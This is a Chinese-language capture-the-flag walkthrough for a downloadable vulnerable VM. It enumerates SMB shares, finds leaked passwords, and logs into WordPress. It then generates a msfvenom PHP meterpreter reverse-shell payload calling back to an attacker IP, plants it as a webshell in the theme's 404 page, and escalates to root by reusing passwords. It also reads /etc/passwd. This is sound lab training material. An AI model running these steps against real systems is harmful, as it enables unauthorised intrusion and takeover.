一、靶机说明

1、下载链接

  靶场镜像:链接: https://pan.baidu.com/s/1xfKILyIzELi_ZgUw4aXT7w 提取码: 59g0

2、靶机准备

(1)重置靶场密码

  重启主机,疯狂按shift,进入如下界面后,按e

img

  找到linux开头的行,在最后输入 init=/bin/bash,输入完成后按Crtl+X

img

  mount -o rw,remount /,回车

  passwd root,输入新密码两次

img

  如果提示改变密码成功,重启该虚拟机

(2)查看IP

  使用刚才修改的密码进入靶场主机,输入ip a,查看IP地址

image-20211209213315122

二、信息收集

1、探测主机IP

  可以使用arp-scan或者netdiscover

(1)arp-scan

  使用arp-scan探索靶机IP,发现IP地址为192.168.1.107

arp-scan -l

image-20211209213356263

(2)netdiscover

netdiscover -r 192.168.1.1/24

image-20211209213701557

2、开放端口与服务扫描

  使用nmap对IP进行扫描:

nmap -sV 192.168.1.107

image-20211209214141466

  可以看到开放了SMB、Mysql、SSH服务

三、漏洞探测与利用

1、针对SMB协议弱点检测

  因为这节主要针对的是smb协议,所以对其进行一波探测
  首先,使用空口令: smbclient -L IP,列出该ip所分享的文件和链接。

image-20211209214430599

Print 是 共享驱动 , 就是共享打印机

Share 是共享文件夹
IPC$ 是共享空连接,不需要用户名就能登陆的web服务器

  查看print里面的东西(没有权限)

smbclient '\\IP\print$'

image-20211209214941328

  查看share共享文件夹里的东西

smbclient '\\IP\share$'

image-20211209215010614

  get+文件名,可以下载获得文件信息

image-20211209215149689

  打开新的终端,打开文件:发现写着密码为12345

image-20211209215242375

  相同的方法下载todolist.txt下来看看

image-20211209215330173

  接下来打开wordpress看看,主要看配置文件

image-20211209215530723

  可以从前面看到该服务器开放了mysql 3306端口,尝试直接连接数据库,但是失败了,应该是设置了只能从本地连接

mysql -h 192.168.1.107 -uroot -pTogieMYSQL12345^^

image-20211209215826411

  因为开放了22端口,尝试使用ssh协议远程登录,但显示密码不对

ssh Admin@192.168.1.107

image-20211209220036225

  针对smb协议,查看是否存在远程溢出漏洞进行分析

searchsploit samba版本号

image-20211209220226503

  没有任何漏洞可以利用

2、针对HTTP协议弱点探测

(1)目录扫描

  发现wrodpress的wp-login.php

dirsearch -u http://192.168.1.107

image-20211209220716008

  打开网页看看

image-20211209221510525

  输入前面的wp-config.php中的账号和密码,成功进入

image-20211209222113703

(2)构造payload获取shell

  使用msfvenom构造payload

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.106 lport=4444 -f raw > shell.php

  打开msfconsole,开启监听

image-20211209222737298

(3)在wordpress中上传webshell

  将shell.php的内容粘贴到 wordpress中的Appearance中,Editor中的404页面

image-20211209223113046

  点击update file

image-20211209223145775

  接下来访问404页面:http://192.168.1.107/wordpress/wp-content/themes/twentyfifteen/404.php(注意这里的**twentyfifiteen**要按照图中自己的实际情况修改)

image-20211209223348756

  查看监听端,成功反弹shell

image-20211209223633375

(4)优化终端

  调用交互式命令行,优化终端

python -c "import pty;pty.spawn('/bin/bash')"

(5)获得flag

  使用cat /etc/passwd命令,来查看每个用户账号的属性。

image-20211209223934049

  可以看到里面有一个熟悉的,在wordpress页面中出现了很多次的用户togie,切换到其账户:

su togie

  密码是之前deets.txt中写的12345,成功进入

image-20211209224026734

  使用sudo -i命令进入root模式,密码同样是12345

image-20211209224101238

  进入root目录,可以看到proof.txt文件。

image-20211209224331324